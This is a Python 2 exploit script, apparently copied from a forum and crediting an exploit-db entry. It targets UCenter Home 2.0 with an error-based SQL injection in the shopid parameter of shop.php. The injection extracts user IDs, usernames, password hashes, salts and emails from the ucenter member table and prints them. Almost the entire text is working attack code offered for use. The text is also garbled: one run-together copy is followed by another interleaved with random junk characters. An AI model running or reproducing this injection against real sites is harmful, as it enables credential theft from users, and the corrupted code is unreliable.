#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
4 M0 T9 E" H9 P1 c7 @- ^! d; V; r
) {" }: H |* z9 i2 G% h/ }7 a8 z6 r: D
#!/usr/bin/env python 1 m4 H9 {% Z$ Y" `- q2 K
3 K$ _, U8 _) _5 [' c
import sys - [+ D" H& U% l. w0 k, B; P
import urllib2
- |3 ?7 f: t1 x8 ?- ]' himport re , R$ h% |, v0 {/ ^* @
% g& B3 N( i% t+ u$ f; n5 T
def info(): 1 L6 z- m) ~- v& z* J
print 'From:http://www.exploit-db.com/exploits/14997/' , r, a3 r: j8 Q6 V/ e! j2 K
print 'http://www.hake.cc/Web_loudong/'
9 B2 M! S% S Z6 o1 b0 p2 L print 'changed:qiaoy'
1 ~; h* ^9 M" D- c* @2 J7 O print 'exp:'
: K8 q! n# t8 y' \* B print ' ./UCenter_Home_2.0.py site'
8 [& x( c% t, \ + \0 H8 }4 l4 ]$ a/ {) A# M
def main(): " S) Y3 {: p* b- H
if len(sys.argv) != 2:
6 ^9 w6 ^1 W! @" z* n6 e info() 5 X& x( ^1 t+ z* U% z9 D8 ?5 p
else: 1 ]- H5 s7 ?& H4 s9 ~6 j
site = sys.argv[1]
! ?0 s4 Y* W# X' x* ^8 x6 ^! E if site[0:7] == 'http://': ) C; {# O* u8 C$ n
sitesite =site
5 S, f2 d9 K' K2 j& V elif site[0:8] == 'https://': 3 `1 @# g. g! V' R
sitesite = site
2 z* s1 X( q! i1 b# a! x, O5 v else:
9 R, |: X3 g3 I" w site = 'http://'+site * o6 j n- x/ `8 t( C7 l
try:
' o2 j2 e2 ?- l6 f+ }' a url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1' 5 X! P+ F( v" |( a+ L
Value = urllib2.urlopen(url).read()
) [% N* Q4 [8 s% p& b$ J3 a. F% I+ M Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]
1 F" Y: M$ _% u. ~3 T& n" \0 ~ hacked = Msg.split(':') 7 U. L4 w4 H" R' K0 l4 x* I& ]
print 'Name: '+hacked[1] f7 h. B& x: z! r4 p
print 'Passwd: '+hacked[2]
7 m9 `6 ^6 M, m h# c0 a8 u print 'salt: '+hacked[3] % E& y% |& C" N
print 'email: '+hacked[4] - ^, x8 P# X8 T8 q" W
except:
% l3 L7 [' ?! k% Q1 C print 'Sorry,I can\'t work............'
& z, Y& z/ e8 |6 a1 f c- } ' [' `$ E# ]1 W$ I- n3 Z
if __name__ == '__main__':
R2 b* Q6 y/ ` main() |